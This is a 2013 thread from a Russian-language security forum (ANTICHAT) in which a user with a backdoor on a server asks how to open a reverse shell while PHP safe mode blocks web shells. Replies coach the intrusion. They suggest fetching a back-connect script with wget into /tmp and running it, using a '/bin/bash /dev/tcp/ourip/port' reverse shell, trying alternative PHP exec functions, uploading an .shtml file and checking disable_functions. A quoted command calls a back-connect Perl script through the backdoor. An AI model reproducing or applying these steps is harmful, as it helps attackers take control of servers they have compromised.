HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.01.2013, 01:47
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию

На сервере не работает ни 1 шел, сейф мод включен

Вопрос:

Как через бекдор, сделать бекконект, не имея шела?

Пытался залить скрипт бэкконекта, и запустить командой

Цитата:
Сообщение от None  
?cmd=system('perl dc.pl 127.0.0.1 8080');
Но увы не получилось, какие ещё есть способы?
 
Ответить с цитированием

  #2  
Старый 25.01.2013, 09:10
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
Но увы не получилось, какие ещё есть способы?
Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.

P.S. возможно не работает команда system, попробуй другие.
 
Ответить с цитированием

  #3  
Старый 25.01.2013, 15:11
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Вот я и спрашиваю какие другие есть, есть пример ?
passthru, system, exec, shell_exec
 
Ответить с цитированием

  #4  
Старый 25.01.2013, 20:51
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Покури вот в этом ключе:

/bin/bash /dev/tcp/ourip/port
 
Ответить с цитированием

  #5  
Старый 25.01.2013, 21:08
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Cennarios  
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port
Скорее всего у него отключены функции для выполнения системных команд
 
Ответить с цитированием

  #6  
Старый 25.01.2013, 22:27
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.
 
Ответить с цитированием

  #7  
Старый 25.01.2013, 22:43
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию

shtml шелл

еще команды, позволяющие выполнить команду - proc_open, popen
 
Ответить с цитированием

  #8  
Старый 26.01.2013, 11:11
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Цитата:
Сообщение от OxoTnik  
Пробовал, реакций нету...
Аналогично, 0
Тогда зиливай перловский скрипт на backconnect и через него додалбливай.
 
Ответить с цитированием

  #9  
Старый 26.01.2013, 14:20
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию

выведи значение disable_functions
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.